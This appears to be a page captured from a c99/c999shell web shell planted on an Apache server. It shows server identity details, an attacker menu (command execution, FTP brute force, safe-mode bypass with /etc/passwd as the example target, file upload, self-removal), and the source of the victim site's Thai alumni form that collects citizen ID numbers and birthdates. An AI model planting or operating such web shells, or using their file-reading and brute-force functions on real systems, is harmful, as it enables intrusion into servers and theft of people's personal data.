!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/ealumni/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_infoAm_1.php (6.91 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<SCRIPT language=JavaScript type="text/JavaScript">
function checkId(){
    var data = document.getElementById('citizenId');

    if (data.value.length==13){
        for(i=0,sum=0;i<12;i++)
            sum += parseFloat(data.value.charAt(i))*(13-i);
            if((11-sum%11)%10!=parseFloat(data.value.charAt(12))){
                alert('เลขบัตรประชาชนไม่ถูกต้อง กรุณาป้อนเลขบัตรประชาชนใหม่');
                document.getElementById('citizenId').style.color = "red";
            }else{
                document.getElementById('citizenId').style.color = "green";
            }
    }else if(data.value!=""){
        alert('เลขบัตรประชาชนไม่ครบ 13 หลัก');
    }
}
</SCRIPT>
<?php
$row_am = (isset($qu_am) && $qu_am!=NULL) ? $qu_am->row() : NULL;
$row_regName = (isset($qu_regName) && $qu_regName!=NULL) ? $qu_regName->row() : NULL;
?>
<?php echo form_open_multipart($this->config->item("ea_folder")."info_alumni/process_infoAm_1", array("name" => "myform""id" => "myform"));?>
<table class="szone">
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td colspan="4" height="25px" class="inddent"><span class="h error indent">ข้อมูลส่วนตัว</span></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone">ชื่อ - สกุลปัจจุบัน ไทย</td>
        <td>
        <input type="text" name="prefixName" id="prefixName" value="<?php echo set_value('prefixName'setValue('prefixName',$row_am));?>" readonly size="8" class="input2" />
        <input type="hidden" name="prefixId" id="prefixId" value="<?php echo set_value('prefixId'setValue('prefixId',$row_am));?>" />
<?php
        echo anchor_popup($this->config->item("ea_folder")."popup/prefix""<img src=\"".base_url().$this->config->item('rg_search')."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "550""height" => "350"));
?>
        <input type="text" name="studentName" id="studentName" value="<?php echo set_value('studentName'setValue('studentName',$row_am));?>" size="15" maxlength="30" />
        <input type="text" name="studentSurname" id="studentSurname" value="<?php echo set_value('studentSurname'setValue('studentSurname',$row_am));?>" size="15" maxlength="30" />
        <span class="error"> *<?php echo form_error('prefixId') ? form_error('prefixId') : (form_error('studentName') ? form_error('studentName') : form_error('studentSurname'));?></span></td>
        <td class="coltd_szone">ชื่อ - สกุลปัจจุบัน อังกฤษ</td>
        <td>
        <input type="text" name="prefixNameEng" id="prefixNameEng" value="<?php echo set_value('prefixNameEng'strtoupper(setValue('prefixNameEng',$row_am)));?>" readonly size="8" class="input2" />
        <input type="text" name="studentNameEng" id="studentNameEng" value="<?php echo set_value('studentNameEng'setValue('studentNameEng',$row_am));?>" size="15" maxlength="30" />
        <input type="text" name="studentSurnameEng" id="studentSurnameEng" value="<?php echo set_value('studentSurnameEng'setValue('studentSurnameEng',$row_am));?>" size="15" maxlength="30" />
        <span class="error"> *<?php echo form_error('studentNameEng') ? form_error('studentNameEng') : form_error('studentNameEng');?></span></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone">ชื่อ - สกุลจากระบบทะเบียน ไทย</td>
        <td><?php echo (setValue('regStdName',$row_regName)=='' && setValue('regStdSurname',$row_regName)=='') ? "-" setValue('prefixName',$row_regName).setValue('regStdName',$row_regName).' '.setValue('regStdSurname',$row_regName);?>
        </td>
        <td class="coltd_szone">ชื่อ - สกุลจากระบบทะเบียน อังกฤษ</td>
        <td><?php echo (setValue('regStdNameE',$row_regName)=='' && setValue('regStdSurnameE',$row_regName)=='') ? "-" strtoupper(setValue('prefixNameEng',$row_regName)).' '.setValue('regStdNameE',$row_regName).' '.setValue('regStdSurnameE',$row_regName);?>
        </td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone">รหัสบัตรประชาชน</td>
        <td colspan="3"><input type="text" name="citizenId" id="citizenId" value="<?php echo set_value('citizenId',setValue('citizenId',$row_am));?>" size="14" maxlength="13" class="required-int" onchange="checkId()" />
        <span class="error"><?php echo form_error('citizenId');?></span></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone">วันเกิด</td>
        <td><script>DateInput('birthDate', true, 'DD/MM/YYYY', "<?php echo set_value('birthDate') ? set_value('birthDate') : ((setValue('birthDate',$row_am)=='0000-00-00') ? getNowDateFw2() : splitDateDb2(setValue('birthDate',$row_am),'/'));?>");</script></td>
        <td class="coltd_szone">หมู่เลือด</td>
        <td><input type="text" name="bloodGroup" id="bloodGroup" value="<?php echo set_value('bloodGroup'strtoupper(setValue('bloodGroup',$row_am)));?>" size="4" maxlength="3" />
        <br />(เช่น A, AB, O)
        <?php echo form_error('bloodGroup');?></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone">สัญชาติ</td>
        <td>
<?php
        echo form_dropdown('nationId'$rs_ntset_value('nationId',setValue('nationId'$row_regName)));
?>
        </td>
        <td class="coltd_szone">ศาสนา</td>
        <td>
<?php
        echo form_dropdown('religionId'$rs_rlgset_value('religionId',setValue('religionId'$row_regName)));
?>
        </td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone">อีเมล์</td>
        <td colspan="3"><input type="text" name="studentEmail" id="studentEmail" value="<?php echo set_value('studentEmail',setValue('studentEmail',$row_regName));?>" size="40" maxlength="70" />
        <?php echo form_error('studentEmail');?></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone">รูปนักศึกษา</td>
        <td colspan="3">
        <input type="file" name="picturePath" id="picturePath" value="<?php echo setValue('picturePath'$row_regName);?>" />
        <span class="error"> (ขนาดรูปภาพควรมีขนาด 100x115 pixels เป็น .jpg เท่านั้น และขนาดไฟล์ไม่เกิน 2 MB)</span>
        <span class="error"><?php echo form_error('picturePath');?></span></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td align="center" colspan="4">
        <input type="submit" name="add" id="add" value="บันทึก" />
        <input type="hidden" name="alumniId" id="alumniId" value="<?php echo setValue('alumniId',$row_regName);?>" />
        <input type="hidden" name="tab" id="tab" value="<?php echo $tab;?>" />
        </td>
    </tr>
</table><?php echo form_close();?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0069 ]--